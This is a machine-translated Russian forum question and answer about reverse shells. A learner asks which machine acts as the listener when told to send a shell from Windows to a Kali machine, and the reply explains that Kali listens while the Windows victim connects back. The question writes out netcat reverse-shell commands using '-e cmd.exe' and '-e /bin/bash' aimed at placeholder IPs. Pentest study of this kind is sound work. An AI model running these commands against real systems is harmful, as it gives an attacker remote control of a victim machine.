Создайте обратную оболочку из системы Windows на машину Kali - которая является слушателем - PullRequest
0 голосов
/ 13 октября 2018

Я знаю, что такое оболочки reverse и bind и как их использовать с помощью netcat / ncat, но проблема, с которой я здесь сталкиваюсь (вероятно, потому, что я не являюсь носителем английского языка), заключается в следующем предложении: «Создать обратную оболочку из Windowssystem to Kali machine "

Для меня это звучит так, как будто на компьютере Kali должен быть открыт слушатель, а командная строка подается с компьютера Windows на Kali.Например:

Linux: nc -nvlp portno --allow WindowsIP --ssl

Windows: nc -nv LinuxIP portno -e cmd.exe --ssl

Но чем больше я читаю, тем больше сбивает с толку (для меня).Определения, такие как

«Обратная оболочка получает соединение жертвы или цели с вашим компьютером» *

Или примеры, такие как:

"A может отправить обратную оболочку с Linux-машины A на B: root @ kali: ~ # nc -nv windowsIP-Порт -e / bin / bash"

В этом примере добавляетсяк путанице , потому что если обратная оболочка из Linux в Windows означает обслуживание оболочки bash, то отправка обратной оболочки из Windows в Linux будет означать обслуживание cmd.

Может кто-нибудь объяснить, как это сделатьмы узнаем, какая машина должна быть слушателем при таком запросе?

1 Ответ

0 голосов
/ 14 октября 2018

Ваш вопрос, похоже, об английском.Все, что я могу сказать, это то, что ваша интерпретация верна: слушатель - это машина Кали, жертва - машина Windows (где обслуживается какой-то тип оболочки - обычно cmd или powershell).

I 'Я не уверен, почему вы думаете, что ни одна из цитат, которые вы выделяете, не согласна с этим.Возможно, вторая цитата отбросила вас, потому что в этом случае жертва - это машина Linux, а злоумышленник - машина Windows (это указывает, что у злоумышленника есть windowsIP) - что нетипично, потому что обычно вы атакуете из Kali.Обратите внимание, что в этом случае они дают вам команду, которая запускается на компьютере-жертве, чтобы подключиться обратно к вашей машине, атакующей windowsIP.

Если вы приехали из Kali и можете получить удаленное выполнение кода в Windowsкомпьютер-жертва, то вам нужно запустить netcat на компьютере с Windows, подключившись обратно к вашему Kali.Так что Кали прислушивается к соединению из Windows.Когда вы атакуете компьютер с Windows, вам обычно нужно загрузить бинарную версию Windows Netcat.Затем вы вызываете netcat на компьютере Windows с помощью оболочки cmd.exe или Powershell.Когда он снова подключится к Kali, вы можете запустить эти команды оболочки Windows у своего злоумышленника Kali.

...